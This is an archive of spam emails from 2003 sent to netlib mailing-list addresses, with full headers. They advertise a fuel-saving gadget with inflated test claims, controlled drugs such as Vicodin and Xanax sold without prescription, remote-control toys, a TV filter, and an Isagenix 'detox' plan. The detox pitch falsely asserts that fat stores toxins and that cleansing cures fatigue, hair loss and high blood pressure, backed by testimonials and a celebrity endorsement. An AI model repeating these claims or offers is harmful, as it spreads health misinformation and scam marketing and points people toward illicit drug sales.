--3AEACF27AD29--


From cjy40cqok@yahoo.com Thu Nov  6 11:57:45 2003
Return-Path: <cjy40cqok@yahoo.com>
Received: from ct-shelton1b1a-18.wtrbct.adelphia.net (ct-shelton1b1a-18.wtrbct.adelphia.net [68.171.219.18])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hA6GvbRY020436
	for <blast-funct-archive@netlib2.cs.utk.edu>; Thu, 6 Nov 2003 11:57:39 -0500 (EST)
Received: from [41.68.84.169] by ct-shelton1b1a-18.wtrbct.adelphia.net with ESMTP id 87954742; Thu, 06 Nov 2003 20:57:43 +0400
Message-ID: <alv$z-4-h023-b$svs4ohz@3jv.ztqdyzdb>
From: "Clint Powell" <cjy40cqok@yahoo.com>
Reply-To: "Clint Powell" <cjy40cqok@yahoo.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Subject: Boost Your  Car's Gas Mileage 27%+... ftqlh x isg l
Date: Thu, 06 Nov 03 20:57:43 GMT
X-Mailer: Microsoft Outlook Express 5.00.2919.6700
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary=".C333_C88CAC.04A01F9.D._"
X-Priority: 3
X-MSMail-Priority: Normal


--.C333_C88CAC.04A01F9.D._
Content-Type: text/plain;
Content-Transfer-Encoding: quoted-printable

FUEL SAVER PRO

This revolutionary device Boosts Gas Mileage 27%+ by helping fuel burn bet=
ter using three patented processes from General Motors.

Take a test drive Today - http://www.zppi.org/?axel=3D49

PROVEN TECHNOLOGY
A certified U.S. Environmental Protection Agency (EPA) laboratory recently=
 completed tests on the new Fuel Saver. The results were astounding! Maste=
r Service, a subsidiary of Ford Motor Company, also conducted extensive em=
issions testing and obtained similar, unheard of results. The achievements=
 of the Fuel Saver is so noteworthy to the environmental community, that C=
ommercial News has featured it as their cover story in their June, 2000 ed=
ition.

Take a test drive Today - http://www.zppi.org/?axel=3D49






No more advertisements, thanks - http://www.aqmp.net/out5s/rem2e.asp































asm ahhsobmtjoi m czgdcuj
yvtfzfv

--.C333_C88CAC.04A01F9.D._--


From l5pxbe@yahoo.com Thu Nov  6 19:53:59 2003
Return-Path: <l5pxbe@yahoo.com>
Received: from d14-69-10-93.try.wideopenwest.com (d14-69-10-93.try.wideopenwest.com [69.14.93.10])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hA70rqRY000701;
	Thu, 6 Nov 2003 19:53:56 -0500 (EST)
Received: from [201.239.35.43] by d14-69-10-93.try.wideopenwest.com SMTP id 113L3M7fp2Q76e for <blast-funct-archive@netlib2.cs.utk.edu>; Fri, 07 Nov 2003 03:45:55 +0300
Message-ID: <0$na44a$$1u6@iq75.vg.kle>
From: "Patricia Best" <l5pxbe@yahoo.com>
Reply-To: "Patricia Best" <l5pxbe@yahoo.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-nearterm-archive@netlib2.cs.utk.edu>
Subject: NEW Valium.m Xanax.x Valium.m Vicodin.n csqprrj  iahcx i
Date: Fri, 07 Nov 03 03:45:55 GMT
X-Mailer: Microsoft Outlook, Build 10.0.2616
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="0.7E6D_BB3B6"
X-Priority: 3
X-MSMail-Priority: Normal


--0.7E6D_BB3B6
Content-Type: text/plain;
Content-Transfer-Encoding: quoted-printable

The real_thing, not like 
the other sites that imitate these products.

No hidd.en char.ges - Fast Delivery

*Vic.odin *Val.ium *Xan.ax

*Via.gra *Diaz.epam *Alpra.zolam

*So.ma *Fior.icet *Amb.ien 

*Stil.nox *Ult.ram *Zo.loft 

*Clon.azepam *At.ivan *Tr.amadol 

*Xeni.cal *Cele.brex *Vi.oxx 

*Pro.zac *Bus.par Much M.ore....

http://www.dealsforu.biz/l/117/index.htm






If you have recieved this in error
please use
http://www.dealsforu.biz/optout.html




fhcbdd ow
s dy r biy aej i s bgpgtcvai
zd opnmf xtnkb wagg 
s bce wwo zyzrut d rcilb  y

--0.7E6D_BB3B6--


From y2cuuqzog@hampepartiet.dk Fri Nov  7 02:11:21 2003
Return-Path: <y2cuuqzog@hampepartiet.dk>
Received: from 160.36.58.108 ([211.47.217.197])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hA77BBRY007776;
	Fri, 7 Nov 2003 02:11:14 -0500 (EST)
Received: from (HELO icvru) [104.229.43.36] by 160.36.58.108 id <9490594-96139>; Fri, 07 Nov 2003 09:02:47 +0200
Message-ID: <u44--tiwx$p$iw-tj-90-06@0et.vb.gzsa.w3>
From: "Harvey Glover" <y2cuuqzog@hampepartiet.dk>
Reply-To: "Harvey Glover" <y2cuuqzog@hampepartiet.dk>
To: <blast-comm-archive@netlib2.cs.utk.edu>,
   <blast-funct-archive@netlib2.cs.utk.edu>,
   <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-nearterm-archive@netlib2.cs.utk.edu>,
   <blast-parallel-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>, <netlibd@netlib2.cs.utk.edu>
Subject: Cleanse and Replenish tv
Date: Fri, 07 Nov 03 09:02:47 GMT
X-Mailer: MIME-tools 5.503 (Entity 5.501)
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary=".0A..82.5B65A..27._"
X-Priority: 3
X-MSMail-Priority: Normal


--.0A..82.5B65A..27._
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<!doctype html public "-//w3c//dtd html 4.0 transitional//en">
<html>
<head>
</head>
<body text=3D"#000000" bgcolor=3D"#FFFFFF" link=3D"#3300CC" vlink=3D"#3300=
CC" alink=3D"#3300CC" leftMargin=3D"0" topMargin=3D"0" marginwidth=3D"0" m=
arginheight=3D"0">
<table BORDER=3D0 CELLSPACING=3D0 CELLPADDING=3D0 WIDTH=3D"100=
%" >
<tr>
<td WIDTH=3D"100" BGCOLOR=3D"#339999">&nbsp;</td>

<td BGCOLOR=3D"#339999"><b><font face=3D"Times New Roman,Times"><font colo=
r=3D"#FFFF00"><font size=3D+3>LIVE
LONG AND HEALTHY</font></font></font></b></td>
</tr>

<tr>
<td WIDTH=3D"100" BGCOLOR=3D"#339999">&nbsp;</td>

<td>
<table BORDER=3D0 CELLSPACING=3D0 CELLPADDING=3D15 WIDTH=3D"600" >
<tr>
<td><b><font color=3D"#CC0000"><font size=3D+1>I've Got An Incredible Stor=
y
to Tell You About How I Finally Got Healthy, Clean and Lean...</font></fon=
t></b><b><font size=3D+1></font></b>
<p><b><font color=3D"#CC0000"><font size=3D+1>After a Lifetime of Trying t=
o
Lose Weight!</font></font></b>
<br>&nbsp;
<br>&nbsp;
<br><b><font face=3D"Verdana, Arial, Helvetica, sans-serif"><font size=3D-=
1>Dear
Friend of Chicken Soup for the Soul...</font></font></b>
<p><font face=3D"Verdana, Arial, Helvetica, sans-serif"><font size=3D-1>Yo=
u
probably know my good friend John Gray from his best-selling books,<i>
Men Are From Mars, Women Are From Venus...Mars and Venus On a Date...and
The Mars &amp; Venus Diet &amp; Exercise Solution</i>. Well, recently ,
John introduced me to a new way of healthy living that I immediately benef=
ited
from -- and that I want to share with you today.</font></font>
<p><font face=3D"Verdana, Arial, Helvetica, sans-serif"><font size=3D-1>If=

you've ever met me in person, you know that, for years, I carried around
an extra 20-30 pounds. I wasn't happy about it. In fact, I tried everythin=
g
to get rid of it. Prepackaged meals. Exercising like crazy. Even special
diets. Nothing worked.</font></font>
<p><font face=3D"Verdana, Arial, Helvetica, sans-serif"><font size=3D-1>At=

the time, I thought I was simply battling middle-age spread and way too
many meals on the road. <i>Perhaps it's my stressful schedule, I'd say</i>=
.
Or I'd blame a host of other factors that we all know contribute to excess=

weight. Of course, while all these factors can play a part in a person's
ongoing weight problem, what I didn't know was what <u>really</u> contribu=
ting
to my excess weight in the first place.</font></font>
<p><b><font face=3D"Verdana, Arial, Helvetica, sans-serif"><font size=3D-1=
>The
Real Culprit Is <u>Not</u> Excess Calories</font></font></b>
<p><font face=3D"Verdana, Arial, Helvetica, sans-serif"><font size=3D-1>Wh=
at
I discovered is that, for most of us, the real culprit behind our weight
problem isn't the excess calories we consume, but the preservatives, food
additives, alcohol, environmental chemicals and other harmful toxins
we ingest. In fact, our body actually produces adipose tissue, or fat
cells, as a kind of super-safe storage facility specifically designed to
hold these toxins.</font></font>
<p><font face=3D"Verdana, Arial, Helvetica, sans-serif"><font size=3D-1>Th=
ere,
locked away in our fat cells, the body stores chemicals that would otherwi=
se
harm the body's vital organs and other tissues.&nbsp;</font></font>
<p><font face=3D"Verdana, Arial, Helvetica, sans-serif"><font size=3D-1>As=

more and more environmental pollutants, food additives, prescription medic=
ations
and other powerful toxins enter our system, the body produces more and
more fatty tissue to store these harmful chemicals -- and traps more and
more excess fluid to suspend these toxins within our cells. Years of
toxic buildup can start to overwhelm body systems and cause preventable
disease such as:</font></font>
<br>&nbsp;
<table BORDER=3D0 CELLSPACING=3D0 CELLPADDING=3D9 WIDTH=3D"94=
%" >
<tr>
<td><font face=3D"Verdana, Arial, Helvetica, sans-serif"><font size=3D-1>-=
Headaches</font></font>
<br><font face=3D"Verdana, Arial, Helvetica, sans-serif"><font size=3D-1>-=
Skin irritations</font></font>
<br><font face=3D"Verdana, Arial, Helvetica, sans-serif"><font size=3D-1>-=
Candida (Yeast)</font></font>
<br><font face=3D"Verdana, Arial, Helvetica, sans-serif"><font size=3D-1>-=
Depression</font></font>
<br><font face=3D"Verdana, Arial, Helvetica, sans-serif"><font size=3D-1>-=
Poor memory</font></font></td>
<td><font face=3D"Verdana, Arial, Helvetica, sans-serif"><font size=3D-1>-=
Low energy</font></font>
<br><font face=3D"Verdana, Arial, Helvetica, sans-serif"><font size=3D-1>-=
Bloating or Gas</font></font>
<br><font face=3D"Verdana, Arial, Helvetica, sans-serif"><font size=3D-1>-=
Premature Aging/Wrinkles</font></font>
<br><font face=3D"Verdana, Arial, Helvetica, sans-serif"><font size=3D-1>-=
Poor digestion</font></font>
<br><font face=3D"Verdana, Arial, Helvetica, sans-serif"><font size=3D-1>-=
Weight Gain</font></font></td>
<td><font face=3D"Verdana, Arial, Helvetica, sans-serif"><font size=3D-1>-=
Constipation</font></font>
<br><font face=3D"Verdana, Arial, Helvetica, sans-serif"><font size=3D-1>-=
Insomnia</font></font>
<br><font face=3D"Verdana, Arial, Helvetica, sans-serif"><font size=3D-1>-=
Loss of Hair</font></font>
<br><font face=3D"Verdana, Arial, Helvetica, sans-serif"><font size=3D-1>-=
Age Spots</font></font>
<br><font face=3D"Verdana, Arial, Helvetica, sans-serif"><font size=3D-1>-=
Water Retention</font></font></td>
</tr>
</table>

<p><b><font face=3D"Verdana, Arial, Helvetica, sans-serif"><font size=3D-1=
>How
to Rid the Body of Harmful Toxins</font></font></b>
<p><font face=3D"Verdana, Arial, Helvetica, sans-serif"><font size=3D-1>Fo=
r
thousands of years, the majority of the world's cultures have experienced
the rejuvenating benefits of cleansing and fasting on fruit juices, herbs
and refreshing clear water.</font></font>
<p><font face=3D"Verdana, Arial, Helvetica, sans-serif"><font size=3D-1>Ev=
en
today, millions of people around the world cleanse on a regular basis,
giving their bodies time to rest, heal and expel harmful toxins that becom=
e
stored over time.</font></font>
<p><font face=3D"Verdana, Arial, Helvetica, sans-serif"><font size=3D-1>Of=

course, while these cultures don't cleanse simply to lose weight, the trut=
h
is, detoxifying the body through cleansing is the first step to losing
<u>amazing</u> amounts of fat.</font></font>
<p><font face=3D"Verdana, Arial, Helvetica, sans-serif"><font size=3D-1>Wh=
y?</font></font>
<p><font face=3D"Verdana, Arial, Helvetica, sans-serif"><font size=3D-1>Wh=
en
we detoxify, not only does the body release the fat, the liver also gets
clean -- and gets much more efficient at metabolizing the fat our body
is now eager to be rid of.</font></font>
<p><b><font face=3D"Verdana, Arial, Helvetica, sans-serif"><font size=3D-1=
>Why
Cleansing Is Difficult for Most Americans</font></font></b>
<p><font face=3D"Verdana, Arial, Helvetica, sans-serif"><font size=3D-1>De=
toxifying
with fruit juice, water, exercise or other methods can be quite beneficial=
.
But for most Americans who are addicted to prepackaged carbohydrates, swee=
ts
and other toxic foods cleansing with simple juices and water just isn't
enough.</font></font>
<p><font face=3D"Verdana, Arial, Helvetica, sans-serif"><font size=3D-1>We=

need to rapidly replenish our body's nutritional stores and cut the cravin=
gs,
too.</font></font>
<p><b><font face=3D"Verdana, Arial, Helvetica, sans-serif"><font size=3D-1=
>Revolutionary
New 9-Day Cleansing System</font></font></b>
<br><b><font face=3D"Verdana, Arial, Helvetica, sans-serif"><font size=3D-=
1>Eliminates
Harmful Toxins and Cuts Cravings, Too</font></font></b>
<p><font face=3D"Verdana, Arial, Helvetica, sans-serif"><font size=3D-1>Re=
member
I said my good friend John Gray introduced me to this powerful new way
of eating? For months, John researched products that could help men and
women alike detoxify rapidly, while getting every important enzyme, amino
acid, vitamin, mineral and nutrient.</font></font>
<p><font face=3D"Verdana, Arial, Helvetica, sans-serif"><font size=3D-1>Jo=
hn
discovered -- as I want you to do now -- an amazing system that immediatel=
y
begins whisking away fatty tissue and excess fluid -- as it revitalizes
the body's digestive, nervous and other systems and replenishes critical
nutritional reserves.</font></font>
<p><font face=3D"Verdana, Arial, Helvetica, sans-serif"><font size=3D-1><b=
>It's
called Isagenix...and to say it's sweeping the nation would be an understa=
tement.</b>
The program begins with a simple 2-day cleanse on the Isagenix Fast-Start
Drink -- a delightful berry flavored drink you enjoy four times each day.
Many people lose significant amounts of weight in just the first two days,=

as their bodies turn from fat-storing to fat-burning. Two Isagenix capsule=
s
complete your nutritional intake.</font></font>
<p><font face=3D"Verdana, Arial, Helvetica, sans-serif"><font size=3D-1>Fo=
r
the next five days, eat one healthy meal you prepare, then substitute the
delicious Isagenix Meal Alternative Shake for your two other meals. At
the end of the five days, cleanse another two days on the Isagenix Fast-St=
art
Drink.</font></font>
<p><b><font face=3D"Verdana, Arial, Helvetica, sans-serif"><font size=3D-1=
>It's
that simple!&nbsp;</font></font></b>
<p><font face=3D"Verdana, Arial, Helvetica, sans-serif"><font size=3D-1>If=

you still need to shed extra pounds, simply repeat the 9-Day Cycle until
you reach your optimum weight. Along the way, you'll be totally supported
with more than 240 nutrients that metabolize fat, aid digestion, boost
energy and support cells and tissues. Of course, these products do not
contain ephedra, ma huang, kola-nut or added caffeine as stimulants.</font=
></font>
<p><b><font face=3D"Verdana, Arial, Helvetica, sans-serif"><font size=3D-1=
>I
Personally Lost 33 Pounds in Just 35 Days!</font></font></b>
<p><font face=3D"Verdana, Arial, Helvetica, sans-serif"><font size=3D-1>No=
t
only that, but my joints feel better. I'm light on my feet. I have incredi=
ble
energy. And best of all -- the sweets, pastas, wines and other no-no's
I used to eat now have no hold over me whatsoever! Incredibly, I've kept
my weight off month after month, simply by making sure I have these nutrie=
nts
in my body every day.</font></font>
<p><b><font face=3D"Verdana, Arial, Helvetica, sans-serif"><font size=3D-1=
>Now
What About You?</font></font></b>
<p><font face=3D"Verdana, Arial, Helvetica, sans-serif"><font size=3D-1>Ca=
n
you imagine losing unsightly fat and trapped excess fluid quickly, dramati=
cally
-- and safely -- as your body releases stored toxins and returns its syste=
ms
to their optimum function and balance? Read what others have to say about
their Isagenix experience:</font></font>&nbsp;
<center><table BORDER CELLSPACING=3D0 CELLPADDING=3D9 WIDTH=3D"80=
%" borderColor=3D"#006666" >
<tr>
<td BGCOLOR=3D"#FFFFCC"><b><font face=3D"Verdana, Arial, Helvetica, sans-s=
erif"><font size=3D-1>27
Lbs. Lighter and Chronic Fatigue Symptoms Gone!&nbsp;</font></font></b>
<p><font face=3D"Verdana, Arial, Helvetica, sans-serif"><font size=3D-1>I
have had fibromyalgia and chronic fatigue for as long as I can remember.
I began using ISAGENIX about four months ago and have lost 27 pounds. But
the real clincher is I am symptom-free and I have never felt this good
in my life.</font></font>
<br><b><font face=3D"Verdana, Arial, Helvetica, sans-serif"><font size=3D-=
1>--
Donna Payton, Provo UT</font></font></b>
<p><b><font face=3D"Verdana, Arial, Helvetica, sans-serif"><font size=3D-1=
>Husband
Drops 63 Pounds and Family Is Together Again!</font></font></b>
<p><font face=3D"Verdana, Arial, Helvetica, sans-serif"><font size=3D-1>My=

husband had arrived at the pinnacle of bad health. The doctor explained
if he didn't lose 80 to 100 pounds, he was on his way to an early death.
My husband was miserable and took out his depression on those around him.
This led to a breakdown of the family. When I heard about ISAGENIX, I conv=
inced
my husband to try it. In the first 8 days he lost 15 pounds; and in six
weeks, a total of 63 pounds. You cannot imagine what this does for a perso=
n.
I can't explain the feeling you get when your husband tells you for the
first time in EIGHT years that he loves you, or when you see him interacti=
ng
with your children again. I have the man back that I married 20 years ago!=
</font></font>
<br><b><font face=3D"Verdana, Arial, Helvetica, sans-serif"><font size=3D-=
1>--
Amy Holland, Sweetwater TX</font></font></b>
<p><b><font face=3D"Verdana, Arial, Helvetica, sans-serif"><font size=3D-1=
>Certified
Nutritional Counselor Recommends!!</font></font></b>
<p><font face=3D"Verdana, Arial, Helvetica, sans-serif"><font size=3D-1>As=

a Certified Nutritional Counselor, I had been looking for over four years
for a safe and effective weight management product for my clients. I had
not found what I had been seeking until ISAGENIX. I personally lost 10
pounds on the program and feel great. It's a privilege as a healthcare
professional to promote a product that empowers people to lead a healthier=

life.</font></font>
<br><b><font face=3D"Verdana, Arial, Helvetica, sans-serif"><font size=3D-=
1>--
LeFils Gay, Valdosta CA</font></font></b>
<p><b><font face=3D"Verdana, Arial, Helvetica, sans-serif"><font size=3D-1=
>40
Pounds in Six Weeks!</font></font></b>
<p><font face=3D"Verdana, Arial, Helvetica, sans-serif"><font size=3D-1>I
was introduced to ISAGENIX by my doctor. After 6 weeks, I had lost 40 poun=
ds.
My waist size has gone from 49 to 36 inches, but the result I am most plea=
sed
with is being able to get off blood pressure medication after the second
week of being on the ISAGENIX program.</font></font>
<br><b><font face=3D"Verdana, Arial, Helvetica, sans-serif"><font size=3D-=
1>--
Chan Prosser, Colliersville TX&nbsp;</font></font></b>
<p><b><font face=3D"Verdana, Arial, Helvetica, sans-serif"><font size=3D-1=
>Famous
Fitness Expert Adds ISAGENIX to Her Program!</font></font></b>
<p><font face=3D"Verdana, Arial, Helvetica, sans-serif"><font size=3D-1>IS=
AGENIX
has become an incredible addition to my 24-Hour Turnaround Program--helpin=
g
my clients both physiologically and emotionally to achieve fast, safe and
permanent weight loss and health improvements. The cleaning of the liver
and the high quality nutrients and enzymes work synergistically with my
exercise program to change the body from a fat storer to a fat burner.</fo=
nt></font>
<br><b><font face=3D"Verdana, Arial, Helvetica, sans-serif"><font size=3D-=
1>--
Jay Williams, Ph.D., Mauna Lani Resort, Hawaii, author The 24 Hour Turnaro=
und</font></font></b></td>
</tr>
</table></center>

<p><br><font face=3D"Verdana, Arial, Helvetica, sans-serif"><font size=3D-=
1>It's
no secret -- dramatic weight loss and profound health improvements are
often a welcome side benefit of the Isagenix nutritional program!</font></=
font>
<p><b><font face=3D"Verdana, Arial, Helvetica, sans-serif"><font size=3D-1=
>Get
Started Today!</font></font></b>
<p><font face=3D"Verdana, Arial, Helvetica, sans-serif"><font size=3D-1>In=

the next 24 hours, you too can take a step toward getting healthy, clean
and lean.</font></font>
<br><font face=3D"Verdana, Arial, Helvetica, sans-serif"><font size=3D-1>&=
nbsp;</font></font>
<center><b><font face=3D"Verdana, Arial, Helvetica, sans-serif"><font colo=
r=3D"#FF0000"><font size=3D+2>1-800-591-7751 ext:83</font></font></font></=
b>
<br><b><font face=3D"Arial, Helvetica, sans-serif"><font size=3D+0>Call No=
w
to order the Isagenix 9-Day Cleansing&nbsp;</font></font></b>
<br><b><font face=3D"Arial, Helvetica, sans-serif"><font size=3D+0>and Fat=
-Burning
System</font></font></b></center>

<p><b><font face=3D"Arial, Helvetica, sans-serif"><font size=3D+0>Or becom=
e
a distributor</font></font></b><font face=3D"Verdana, Arial, Helvetica, sa=
ns-serif"><font size=3D-1>
like I did and enjoy $40 off your first order.</font></font>
<p><font face=3D"Verdana, Arial, Helvetica, sans-serif"><font size=3D-1>Ne=
ed
to ask your doctor about starting on the program? That's a great idea.
But first, call now to hear what other </font></font><b><font face=3D"Aria=
l, Helvetica, sans-serif"><font size=3D+0>doctors
have already said</font></font></b><font face=3D"Verdana, Arial, Helvetica=
, sans-serif"><font size=3D-1>
about this amazing system. In fact, I showed my own doctor these products
and now he's recommending Isagenix to his other patients! The </font></fon=
t><b><font face=3D"Arial, Helvetica, sans-serif"><font size=3D+0>ingredien=
ts</font></font></b><font face=3D"Verdana, Arial, Helvetica, sans-serif"><=
font size=3D-1>
are top-quality and, according to the U.S. Food &amp; Drug Administration,=

are generally regarded as safe.</font></font>
<p><font face=3D"Verdana, Arial, Helvetica, sans-serif"><font size=3D-1>In=

closing, I know that you will want to benefit as much as I have from
the Isagenix Cleansing &amp; Fat-Burning System. But first you have to
start. It's easy to get going, and I know you'll see a dramatic improvemen=
t
in your health and well-being.</font></font>
<br><font face=3D"Verdana, Arial, Helvetica, sans-serif"><font size=3D-1>D=
on't
hesitate. <b><font color=3D"#FF0000">CALL 1-800-591-7751 ext:83 Now!</font=
></b>
Your products will arrive in just a few days.</font></font>
<p><font face=3D"Verdana, Arial, Helvetica, sans-serif"><font size=3D-1>In=

friendship,</font></font>
<p><b><font face=3D"Verdana, Arial, Helvetica, sans-serif"><font size=3D-1=
>JACK
CANFIELD</font></font></b>
<br><font face=3D"Verdana, Arial, Helvetica, sans-serif"><font size=3D-1>C=
o-Creator,
Chicken Soup for the Soul</font></font>
<br>&nbsp;</td>
</tr>
</table>
</td>
</tr>
</table>
<center><font face=3D"Arial"><font color=3D"#000000"><font size=3D-2>This =
message
is sent in compliance of the proposed bill SECTION 301, paragraph (a)(2)(C=
)
of S. 1618.</font></font></font>
<br><font face=3D"Arial"><font color=3D"#000000"><font size=3D-2>to be rem=
oved
from this mailing, please utilize our <a href=3D"http://biogenusa.biz/nomo=
re.html">remove
link here</a></font></font></font></center>
</body>
</html>
fdk jaj lyusgnblwoje

--.0A..82.5B65A..27._--


From uwwhwkvhl1@yahoo.com Fri Nov  7 11:43:44 2003
Return-Path: <uwwhwkvhl1@yahoo.com>
Received: from 160.36.58.108 ([200.79.231.41])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hA7GhdRY023916
	for <blast-funct-archive@netlib2.cs.utk.edu>; Fri, 7 Nov 2003 11:43:43 -0500 (EST)
Received: from [128.42.57.200]
	by 160.36.58.108 with ESMTP id <146343-47220>;
	Fri, 07 Nov 2003 18:43:43 +0200
Message-ID: <hn-79-6-94i-w$5$4-tq$pg1$983p@uevcx2>
From: "Natalia Hood" <uwwhwkvhl1@yahoo.com>
Reply-To: "Natalia Hood" <uwwhwkvhl1@yahoo.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Subject: Mini Remote Control Cars & Boats - Great Xmas Gifts...  grwidtuy
Date: Fri, 07 Nov 03 18:43:43 GMT
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="DD5F._ED2A"
X-Priority: 3
X-MSMail-Priority: Normal


--DD5F._ED2A
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<p>New Mini Remote Control Cars &amp; Boats.</p>
<IMG SRC=3D"http://www.onii.org/images/home/stunt_flip.gif" ALT=3D""><a hr=
ef=3D"http://www.onii.org/?axel=3D49">Follow Us For Fun...</a><br>
<p>Turbo Twister Mini RC stunt cars are the newest RC stunt cars in 
the world! These 2 1/2 inch stunt cars rotate, flip, and tumble everywhere=
!</p>
<IMG SRC=3D"http://www.onii.org/images/home/car_purple.jpg" ALT=3D""><a hr=
ef=3D"http://www.onii.org/?axel=3D49">Follow Us For Fun...</a><br>
<p>Honda S2000 (yellow) - fully functional wireless remote control (Radio-=
frequency)</p>
<IMG SRC=3D"http://www.onii.org/images/home/boat_yellow.jpg" ALT=3D""><a h=
ref=3D"http://www.onii.org/?axel=3D49">Follow Us For Fun...</a><br>
<p>Mini RC Ocean Runner Boat (yellow) - Fully functional remote control bo=
at with 6 way remote control.</p>
<br>
<br>
<br>
<br>
<a href=3D"http://www.aqmp.net/out5s/rem2e.asp">No more advertisements</a>=
</p>
<br>
<br>
<br>
<br>dxwreqh 
smht gz

--DD5F._ED2A--


From 242xucdt@yahoo.com Fri Nov  7 16:09:19 2003
Return-Path: <242xucdt@yahoo.com>
Received: from h00e018397329.ne.client2.attbi.com (h00e018397329.ne.client2.attbi.com [24.128.250.126])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hA7L9IRY002491;
	Fri, 7 Nov 2003 16:09:18 -0500 (EST)
Received: from (HELO rbqh7c) [206.20.40.114] by h00e018397329.ne.client2.attbi.com with ESMTP id <832047-28636>; Fri, 07 Nov 2003 15:04:40 -0600
Message-ID: <982k4x-vu7-7508a01$y2u-631-c-5@ve2y02w5fk>
From: "Gertrude Vincent" <242xucdt@yahoo.com>
Reply-To: "Gertrude Vincent" <242xucdt@yahoo.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>
Subject: RE:Valium.m Xanax.x Vicodin.n Valium.m jyni zezunf 
Date: Fri, 07 Nov 03 15:04:40 GMT
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary=".20.9FF_23.B2_52BD869."
X-Priority: 3
X-MSMail-Priority: Normal


--.20.9FF_23.B2_52BD869.
Content-Type: text/plain;
Content-Transfer-Encoding: quoted-printable

The real_thing, not like 
the other sites that imitate these products.

No hidd.en char.ges - Fast Delivery

*Vic.odin *Val.ium *Xan.ax

*Via.gra *Diaz.epam *Alpra.zolam

*So.ma *Fior.icet *Amb.ien 

*Stil.nox *Ult.ram *Zo.loft 

*Clon.azepam *At.ivan *Tr.amadol 

*Xeni.cal *Cele.brex *Vi.oxx 

*Pro.zac *Bus.par Much M.ore....

http://www.dealsforu.biz/l/117/index.htm






If you have recieved this in error
please use
http://www.dealsforu.biz/optout.html



eley bze q
kzwojweqlzosxciknryzmpn  bn
k vg
mzpgqjahpooa 

--.20.9FF_23.B2_52BD869.--


From wzvil2@yahoo.com Fri Nov  7 22:35:11 2003
Return-Path: <wzvil2@yahoo.com>
Received: from pcp319790pcs.waldrf01.md.comcast.net (pcp319790pcs.waldrf01.md.comcast.net [68.50.154.8])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hA83ZARY008792;
	Fri, 7 Nov 2003 22:35:10 -0500 (EST)
Received: from [106.222.198.221]
	by pcp319790pcs.waldrf01.md.comcast.net with SMTP;
	Sat, 08 Nov 2003 10:37:45 +0600
Message-ID: <u$6-g1gn-$es$$3$x6-1-j4f2b67@b8l.hx>
From: "Lara Sykes" <wzvil2@yahoo.com>
Reply-To: "Lara Sykes" <wzvil2@yahoo.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-nearterm-archive@netlib2.cs.utk.edu>
Subject: NEW Ativan.n Valium.m Vicodin.n Xanax.x svsf
Date: Sat, 08 Nov 03 10:37:45 GMT
X-Mailer: Microsoft Outlook Express 5.50.4522.1200
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="FEE_B_9.4._C_"
X-Priority: 3
X-MSMail-Priority: Normal


--FEE_B_9.4._C_
Content-Type: text/plain;
Content-Transfer-Encoding: quoted-printable

The real_thing, not like 
the other sites that imitate these products.

No hidd.en char.ges - Fast Delivery

*Vic.odin *Val.ium *Xan.ax

*Via.gra *Diaz.epam *Alpra.zolam

*So.ma *Fior.icet *Amb.ien 

*Stil.nox *Ult.ram *Zo.loft 

*Clon.azepam *At.ivan *Tr.amadol 

*Xeni.cal *Cele.brex *Vi.oxx 

*Pro.zac *Bus.par Much M.ore....

http://www.betterthis.biz/l/105/index.htm






If you have recieved this in error
please use
http://www.betterthis.biz/optout.html









bvvpw gi  qxkmn enidjgly
gtpvgupt pe tf urdoknnkrlezvkhkff

--FEE_B_9.4._C_--


From aquyuadj@yahoo.com Sat Nov  8 10:29:55 2003
Return-Path: <aquyuadj@yahoo.com>
Received: from 160.36.58.108 ([203.217.126.11])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hA8FToRY023722
	for <blast-funct-archive@netlib2.cs.utk.edu>; Sat, 8 Nov 2003 10:29:52 -0500 (EST)
Received: from [11.37.93.52] by 160.36.58.108 for <blast-funct-archive@netlib2.cs.utk.edu>; Sat, 08 Nov 2003 17:27:54 +0200
Message-ID: <igo-5-38gwxdp@mshm4v4v>
From: "Elliott Mccarty" <aquyuadj@yahoo.com>
Reply-To: "Elliott Mccarty" <aquyuadj@yahoo.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Subject: PROTECT YOUR CHILDREN From Offensive Language On Your TV With ProtecTV... zwuer zya dxb bwn
Date: Sat, 08 Nov 03 17:27:54 GMT
X-Mailer: Microsoft Outlook Express 6.00.2462.0000
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="5DA5_74B5_A.9DEF5C.BDFB"
X-Priority: 3
X-MSMail-Priority: Normal


--5DA5_74B5_A.9DEF5C.BDFB
Content-Type: text/plain;
Content-Transfer-Encoding: quoted-printable

Protect Your Children With ProtecTV.

ProtecTV gives you the power to block the cursing and offensive language c=
oming into your home through television and video.

ProtecTV filters out more than 400 offensive words.

ProtecTV works with your TV, VCR, Satellite, Cable Box and DVD player.

ProtecTV is easy to connect.

Get ProtectTV Today - www.bargaindeals.bz

Go here if you wish to be excluded from our advertising - www.XhenTronic.n=
et?unsub=3D10010000858361131




















s upswti
